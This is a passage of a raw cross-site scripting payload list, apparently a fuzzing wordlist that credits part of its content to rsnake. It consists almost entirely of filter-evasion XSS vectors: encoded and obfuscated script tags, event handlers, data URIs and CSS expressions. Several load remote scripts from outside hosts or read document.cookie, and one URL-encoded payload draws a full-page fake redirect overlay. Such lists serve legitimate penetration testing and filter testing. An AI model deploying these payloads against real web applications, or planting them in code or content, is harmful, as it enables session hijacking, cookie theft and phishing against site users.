Tab;%29></iframe> ?\n<svg><script ?>alert(1)\n<iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\n<img src=`xx:xx`onerror=alert(1)>\n<object type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"></object>\n<meta http-equiv=\"refresh\" content=\"0;javascript&colon;alert(1)\"/>?\n<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n<embed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always>?\n<svg contentScriptType=text/vbs><script>MsgBox+1\n<a href=\"data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>\">X</a\n<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>\n<script>~'\\u0061' ;  \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073.  \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+\n<script/src=\"data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"></script a=\\u0061 & /=%2F\n<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script ????????????\n<object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>\n<script>+-+-1-+-+alert(1)</script>\n<body/onload=&lt;!--&gt;&#10alert(1)>\n<script itworksinallbrowsers>/*<script* */alert(1)</script ?\n<img src ?itworksonchrome?\\/onerror = alert(1)???\n<svg><script>//&NewLine;confirm(1);</script </svg>\n<svg><script onlypossibleinopera:-)> alert(1)\n<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\n<script x> alert(1) </script 1=2\n<div/onmouseover='alert(1)'> style=\"x:\">\n<--`<img/src=` onerror=alert(1)> --!>\n<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?\n<div  style=\"position:absolute;top:0;left:0;width:100%;height:100%\"  onmouseover=\"prompt(1)\" onclick=\"alert(1)\">x</button>?\n\"><img src=x onerror=window.open('https://www.google.com/');>\n<form><button formaction=javascript&colon;alert(1)>CLICKME\n<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?\n<iframe  src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>\n<a  href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click  Me</a>\n\"><img src=x onerror=prompt(1);>\n# credit to rsnake\n<SCRIPT>alert('XSS');</SCRIPT>\n<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>\n<IMG SRC=\"javascript:alert('XSS');\">\n<IMG SRC=javascript:alert('XSS')>\n<IMG SRC=JaVaScRiPt:alert('XSS')>\n<IMG SRC=javascript:alert(&quot;XSS&quot;)>\n<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>\n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\nSRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\n<IMG SRC=\"jav\tascript:alert('XSS');\">\n<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">\n<IMG SRC=\" &#14;  javascript:alert('XSS');\">\n<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>\n<IMG SRC=\"javascript:alert('XSS')\"\n<SCRIPT>a=/XSS/\n\\\";alert('XSS');//\n<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">\n<BODY BACKGROUND=\"javascript:alert('XSS')\">\n<BODY ONLOAD=alert('XSS')>\n<IMG DYNSRC=\"javascript:alert('XSS')\">\n<IMG LOWSRC=\"javascript:alert('XSS')\">\n<BGSOUND SRC=\"javascript:alert('XSS');\">\n<BR SIZE=\"&{alert('XSS')}\">\n<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>\n<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">\n<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">\n<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>\n<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">\n<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>\n<IMG SRC='vbscript:msgbox(\"XSS\")'>\n<IMG SRC=\"mocha:[code]\">\n<IMG SRC=\"livescript:[code]\">\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">\n<META HTTP-EQUIV=\"Link\" Content=\"<javascript:alert('XSS')>; REL=stylesheet\">\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">\n<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\n<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>\n<TABLE BACKGROUND=\"javascript:alert('XSS')\">\n<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">\n<DIV STYLE=\"background-image: url(&#1;javascript:alert('XSS'))\">\n<DIV STYLE=\"width: expression(alert('XSS'));\">\n<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>\n<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">\n<XSS STYLE=\"xss:expression(alert('XSS'))\">\nexp/*<XSS STYLE='no\\xss:noxss(\"*//*\");\n<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>\n<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>\n<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>\n<BASE HREF=\"javascript:alert('XSS');//\">\n<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>\n<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>\ngetURL(\"javascript:alert('XSS')\")\na=\"get\";\n<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas<![CDATA[cript:alert('XSS');\">\n<XML SRC=\"http://ha.ckers.org/xsstest.xml\" ID=I></XML>\n<HTML><BODY>\n<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>\n<!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'\"-->\n<? echo('<SCR)';\n<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\">\n<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\n<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<script>alert(1234)</script>\n<script>prompt(1234)</script>\n<ScripT>alert(1234)</ScRipT>\n/<script>alert(1234)</script>\n<script>var m=<html><a href=\"//host\">link</a>\n<img+src=\"http://localhost\">\n<DIV+STYLE=\"background-image: url(javascript:alert(1))\">\n<IMG+DYNSRC=\"javascript:alert(1);\">\n<IMG+LOWSRC=\"javascript:alert(1);\">\n<isindex+type=image+src=1+onerror=alert(1)>\n<meta style=\"xss:expression(open(alert(1)))\" />\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript:alert(1);\\\">\n<!</textarea <body onload='alert(1)'>\n<img+<iframe =\"1\" onerror=\"alert(1)\">\n<iframe src=\"http://localhost\"></iframe>\n<base+href=\"javascript:alert(1);//\">\n<bgsound+src=\"javascript:alert(1);\">\n<INPUT+TYPE=\"IMAGE\"+SRC=\"javascript:alert(1);\">\n<object+data=\"javascript:alert(0)\">\n<STYLE>li+{list-style-image:url(\"javascript:alert(1)\");}</STYLE><UL><LI>1\n<Layer+src=\"http://localhost\">\n%3E%3Cbody%20onload=javascript:alert(1)%3E\n'\">><marquee><h1>1</h1></marquee>\n</br style=a:expression(alert(1))>\n<font style='color:expression(alert(1))'>\n<embed src=\"data:image/svg+xml;>\n<frameset><frame src=\"xss\"></frameset>\n<link href=\"http://host/xss.css\">\n\"/>%3ciframe%20src%3djavascript%3aalert%283%29%3e\n<object><param name=\"src\" value=\"javascript:alert(0)\"></param></object>\n<isindex action=javascript:alert(1) type=image>\n<b/alt=\"1\"onmouseover=InputBox+1 language=vbs>test</b>\n</a onmousemove=\"alert(1)\">\n'%26%26'javascript:alert%25281%2529//\ndocument.write(\"<scr\"+\"ipt language=javascript src=http://localhost/></scr\"+\"ipt>\");\n<scr<script>ipt>prompt(document.cookie)</scr</script>ipt>\n12&<script>alert(123)</script>=123\n<img src=x:alert(alt) onerror=eval(src) alt=0>\n<img src=/ onerror=alert(1)>\na=\"get\";b=\"URL(\\\"\";c=\"javascript:\";d=\"alert('XSS');\\\")\";eval(a+b+c+d);\n<img/src=\"xss.png\"alt=\"xss\">\n<IMG SRC=\"mocha:[code]\">\n<x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(1);</x:script>\n<STYLE>@import'http://host/css';</STYLE>\n<SCRIPT+a=\">'>\" SRC=\"http://localhost\"></SCRIPT>\n<scr<script>ipt>alert('XSS')</scr</script>ipt>\n%3Cscript%3Ealert(1)%3C/script%3E\nfoo%00<script>alert(document.cookie)</script>\n\"><<script>alert(document.cookie);//<</script>\n><s\"%2b\"cript>alert(document.cookie)</s\"%2B\"cript>\n3Cscript%3Ealert(1)%3C%2Fscript%3E\n%253Cscript%253Ealert(1)%253C/script%253E\n%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e\n%BCscript%BEalert(%A21%A2)%BC/script%BE\n%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE\n<object+data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>\n<a HREF=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==\">ugh</a>\nPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\n<a+href=\"javas&#99;ript&#35;alert(1);\">\n<IMG+SRC=j&#X41vascript:alert(1)>\n<IMG+SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#39;&#41;>\n%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE\n<IMG+SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000039&#0000041>\n%u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e\n+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-\n<INPUT+TYPE=\"checkbox\"+onDblClick=confirm(XSS)>\n<APPLET+CODE=\"\"+CODEBASE=\"http://url/xss\">\n<SCRIPT>alert(String.fromCharCode(88))</SCRIPT>\n&lt;script&gt;prompt(&apos;1&apos;)&lt;/script&gt;\n&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x78;&#x73;&#x73;&#x27;&#x29;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;\n&#x60;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;&#x97;&#x108;&#x101;&#x114;&#x116;&#x40;&#x39;&#x120;&#x115;&#x115;&#x39;&#x41;&#x60;&#x&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;\n&#x74;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;&#x141;&#x154;&#x145;&#x162;&#x164;&#x50;&#x47;&#x170;&#x163;&#x163;&#x47;&#x51;&#x74;&&#x57;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;\n\"+style%3d\"x%3aexpression(alert(1))+\n\\\";alert(1);//\n<img src=\"x:%90\" title=\"onerror=alert(1)//\">\n\"+onmouseover=\"window.location='http://localhost'\n\"+onkeypress=\"prompt(23)\"+\n\"+onfocus=\"prompt(1)\"+\n500);alert(1);//\nalert(document['cookie'])\nwith(document)alert(cookie)\n\";location=location.hash)//#0={};alert(0)\n//\";alert(String.fromCharCode(88,83,83))\n%F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E\n\"+onDblClick=prompt(123)\"+\n\"+onError=prompt(123)\"+\n\"+onReset=prompt(123)\"+\n\";eval(unescape(location))//#%0Aprompt(0)\n<SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT>\n%'});%0aalert(1);%20//\n<script>//>%0Aalert(1);</script>\n<IMG+SRC=\"jav&#x0A;ascript:alert(1);\">\n<IMG+SRC=\"jav%0dascript:alert(1);\">\n<IMG+SRC=\"jav#x0D;ascript:alert(1);\">\n<IMG+SRC=\"jav%09ascript:alert(1);\">\n<IMG+SRC=\"jav&#x09;ascript:alert(1);\">\n%3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E\n<script%00>alert(1)</script%00>\n<scr%00ipt>prompt(1)</sc%00ript>\n<scr\\0ipt>prompt(1)</sc\\0ript>\n%00\"><script>alert(1)</script>\n%3Cscript%0Caaaaa%3Ealert%28123%29%3C/script%0Caaaaa%3E\n<script%0Caaaaa>alert(123)</script>\n%3Cscript%0Baaa%3Ealert%281%29%3C/script%0Baaaa%3E\n%3Cscript%0Baaa%3Ealert%281%29%3C/script%3E\n<*script>prompt(123)<*/script>\n<script%0Daaa>alert(1)</script%0Daaaa>\n<script%20TEST>alert(1)</script%20TESTTEST>\n<SCRIPT/XSSSRC=\"http://host\"></SCRIPT>\n<SCRIPT+SRC=http://host/\n<<SCRIPT>alert(1);//<</SCRIPT>\n< s c r i p t > p r o m p t ( 1 ) < / s c r i p t >\n%uff1cscript%uff1ealert(1234)%uff1c/script%uff1e\njavascript:propmpt(1)\njavascript:eval(unescape(location.href))\na=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert(1);\";eval(a+b+c+d);\nlocation=location.hash.slice(1);\n\";location=location.hash)//#0={};alert(0)\nlocation=location.hash\n\"\"+{toString:alert}\n\"\"+{valueOf:alert}\n\";eval(unescape(location))//# %0Aalert(0)\n\";location.href='http://site';//\n\"><script>alert(1)</script>=1\"onPaste=\"eval(';)\\'SSX\\'(trela'.split('').reverse().join(''))\"\n\"><link rel=\"stylesheet\" href=\"http://8ant.org/asdfqwer.css\"><\"\n\"onfocusin=\"top['\\x61\\x6C\\x65\\x72\\x74']('\\x58\\x53\\x53')\"\n\"onfocusout=\"parent[String.fromCharCode(500-403,500-392,500-399,500-386,500-384)](String.fromCharCode(300-212,300-217,300-217))\"\n\"onfocus=\"window['\\141\\154\\145\\162\\164']('\\130\\123\\123')\"\n\"onKeyDown=\"&#00112;arent['aleraaaaat'.replace('aaaaa','')]('XaaaaaSaaaaaS'.replace('aaaaa','').replace('aaaaa',''))\"\n\"onDblClick=\"&#119;indow['aleraaaat'.re&#0112;lace('aaaa','')]('XaaaaSaaaaS'.re&#0112;lace('aaaa','').re&#0112;lace('aaaa',''))\"\n\"onMouseUp=\"wi&#110dow[Str&#105;ng.fromC&#104;arCode(501-404,501-393,501-400,501-387,501-385)]&#0000040;&#0000039;&#0000088;&#0000083;&#0000083;&#0000039;&#0000041;\"\n\"onMouseEnter=\"&#000097;&#0000108;&#0000101;&#0000114;&#0000116;&#000040;&#000039;&#000088;&#000083;&#000083;&#000039;&#000041;\"\n\"onMouseDown=\"&#00097;&#000108;&#000101;&#000114;&#000116;&#00040;&#00039;&#00088;&#00083;&#00083;&#00039;&#00041;\"\n\"onMouseOut=\"&#0097;&#00108;&#00101;&#00114;&#00116;&#0040;&#0039;&#0088;&#0083;&#0083;&#0039;&#0041;\"\n\"onMouseMove=\"&#097;&#0108;&#0101;&#0114;&#0116;&#040;&#039;&#088;&#083;&#083;&#039;&#041;\"\n\"onMouseLeave=\"&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;\"\n\"onContextMenu=\"&#x000061;&#x00006c;&#x000065;&#x000072;&#x000074;&#x000028;&#x000027;&#x000058;&#x000053;&#x000053;&#x000027;&#x000029;\"\n\"onCopy=\"&#x00061;&#x0006c;&#x00065;&#x00072;&#x00074;&#x00028;&#x00027;&#x00058;&#x00053;&#x00053;&#x00027;&#x00029;\"\n\"onSelect=\"&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x0027;&#x0058;&#x0053;&#x0053;&#x0027;&#x0029;\"\n\"onBlur=\"&#x061;&#x06c;&#x065;&#x072;&#x074;&#x028;&#x027;&#x058;&#x053;&#x053;&#x027;&#x029;\"\n\"onmouseover=\"(new\tFunction('rssseturn(alesssrt)'.&#x73plit('sss').joi&#x6e('')))()(('SXS'+'SXS').slice(-5,4))\"\n\"onclick=\"alert('XSS')\"\n\"><script src=\"file:///c:/wonderful.js\"></script><\"\n<script/src=data:,alert()>\n<marquee/onstart=alert()>\n<video/poster/onerror=alert()>\n<isindex/autofocus/onfocus=alert()>\n<svg id=alert(1337) onload=eval(id)>\n<svg id=javascript:alert(1337) onload=location=id>\n<style onload='execScript(\"InputBox+1\",\"VbScript\");'>\n<a onhelp='eval(href+\"confirm(1)\")'contenteditable='true'href='&#32;javascript:'>click</a>\n<img language=vbs src=<b onerror=alert#1/1#>\n<isindex action=\"javas&Tab;cript:alert(1)\" type=image>\n\"]<img src=1 onerror=alert(1)>\n<input/type=\"image\"/value=\"\"`<span/onmouseover='confirm(1)'>X`</span>\n<svg[U+000B]onload=alert(1)>\n<iframe/name=\"javascript:confirm(1);\"onload=\"while(1){eval(name);}\">\n<cite><a href=\"javascript:confirm(1);\">XSS cited!</a></cite>\n<svg/onload=window.onerror=alert;throw/XSS/;//\n<video src=\"x\" onloadstart=\"alert(1)\">\n<a href=\"javascript:data:alert(1)\">click</a>\n<a href=\"javascript://%0d(0===0&&1==1)%0c?alert(1):confirm(2)\">click</a>\n<div style='x:anytext/**/xxxx/**/n(alert(1)) (\"\\\"))))))expressio\\\")'>aa</div>\n<%%%>\n<meta charset=iso-2022-jp><%1B(Jd%1B(Ji%1B(Jv><i%1B(Jm%1B(Jg s%1B(Jr%1B(Jc%1B(J=%1B(Jx o%1B(Jn%1B(Jer%1B(Jr%1B(Jo%1B(Jr%1B(J=%1B(Ja%1B(Jl%1B(Je%1B(Jr%1B(Jt(1)//%1B(J<%1B(J/%1B(Jd%1B(Jiv%1B(J>%1B(J\n<!-- Hello -- world > <SCRIPT>confirm(1)</SCRIPT> -->\n<! XSS=\"><img src=xx:x onerror=confirm(1)//\">\n\"; ||confirm('XSS') || \"\n<? echo('<SCR)';\n\"/> <img src='aaa' onerror=confirm(document.domain)>\n/> <img src='aaa' onerror=confirm(document.domain)>\n<!-- --!><input value=\"--><body/onload=`confirm(4)//`\">\n<!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:confirm(*num*)>*num*</a>\n//|\\\\ <script //|\\\\ src='http://xss.cx/xss.js'> //|\\\\ </script //|\\\\\n&#0000060\n&#0000060;\n&#0000062\n&#0000062;\n&#000060\n&#000060;\n&#000062\n&#000062;\n&#00060\n&#00060;\n&#00062\n&#00062;\n&#0060\n&#0060;\n&#0062\n&#0062;\n&#00;</form><input type&#61;\"date\" onfocus=\"confirm(1)\">\n&#060\n&#060;\n&#062\n&#062;\n%2522%253E%253Csvg%2520onload%3D%2522confirm(7)%2522%253E\n%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E\n%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E\n%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E\n\"%25prompt(9)%25\"\n\"%26%26prompt(9)%26%26\"\n%26lt%3bscript>\n\"%26prompt(9)%26\"\n%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E\n<3 </3\n&#34;&#62;<h1/onmouseover='\\u0061lert(1)'>%00\n&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'\n%3C\n%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E\n%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E\n%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E\n%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E\n%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E\n%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fx%26%23116%3Bxs%26%2399%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E\n%3Cs%26%2399%3Bri%26%23112%3Bt%20s%26%23114%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E\n%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%3E\n%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fxs%26%23s63%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E\n%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{confirm%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E\n%3E\n[4076*A]<img src=\"x\" alt=\"[0x8F]\" test=\" onerror=confirm(1)//\">\n&#60\n&#60;\n&#62\n&#62;\n<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>\n<A \"\"\"><IMG SRC=\"javascript:confirm(1)\">\n\"'`>ABC<div style=\"font-family:'foo'*chr*x:expression(log(*num*));/*';\">DEF\n\"'`>ABC<div style=\"font-family:'foo*chr*;x:expression(log(*num*));/*';\">DEF\n<A/HREF=\"javascript:confirm(1)\">\n<B <SCRIPT>confirm(1)</SCRIPT>>\n<BASE HREF=\"javascript:confirm('XSS');//\">\n<BGSOUND SRC=\"javascript:confirm('XSS');\">\n<BODY BACKGROUND=\"javascript:confirm('XSS')\">\n<BODY ONLOAD=confirm('XSS')>\n<BR SIZE=\"&{confirm('XSS')}\">\n<B=\"<SCRIPT>confirm(1)</SCRIPT>\">\n<DIV STYLE=\"background-image: url(&#1;javascript:confirm(5))\">\n<DIV STYLE=\"background-image: url(javascript:confirm(5))\">\n<DIV STYLE=\"width: expression(confirm(5));\">\n%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80confirm(1)%E3%B0%80/script%E3%B8%80\n<FRAMESET><FRAME RC=\"\"+\"javascript:confirm(5);\"></FRAMESET>\n<FRAMESET><FRAME SRC=\"javascript:confirm(5);\"></FRAMESET>\n&GT\n&GT;\n<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> 